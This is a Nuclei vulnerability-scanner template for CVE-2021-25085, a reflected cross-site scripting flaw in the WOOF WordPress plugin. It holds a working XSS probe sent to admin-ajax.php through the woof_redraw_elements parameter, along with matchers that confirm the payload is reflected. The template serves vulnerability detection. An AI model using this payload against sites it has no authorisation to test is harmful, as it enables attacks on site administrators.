nuclei-templates/cves/2021/CVE-2021-25085.yaml

43 lines
1.2 KiB
YAML

id: CVE-2021-25085
info:
name: WOOF WordPress plugin - Reflected Cross-Site Scripting
author: Maximus Decimus
severity: medium
description: |
The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.
reference:
- https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90
- https://plugins.trac.wordpress.org/changeset/2648751
- https://nvd.nist.gov/vuln/detail/CVE-2021-25085
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25085
metadata:
verified: true
tags: cve,cve2021,wordpress,wp-plugin,wp,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"additional_fields":["<img src=x onerror=alert(document.domain)>"]}'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by cs 06/21/2022